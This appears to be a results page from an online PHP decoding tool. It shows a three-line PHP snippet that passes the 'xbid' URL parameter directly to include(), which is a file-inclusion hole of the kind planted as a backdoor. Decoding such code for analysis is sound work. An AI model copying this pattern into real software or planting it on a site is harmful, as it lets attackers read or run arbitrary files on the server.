Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $filename=$_GET['xbid']; include ($filename); ?>..
Decoded Output download
<?php
$filename=$_GET['xbid'];
include ($filename);
?>
Did this file decode correctly?
Original Code
<?php
$filename=$_GET['xbid'];
include ($filename);
?>
Function Calls
None |
Stats
MD5 | c24b2fb34e39c607a0481127632890fb |
Eval Count | 0 |
Decode Time | 105 ms |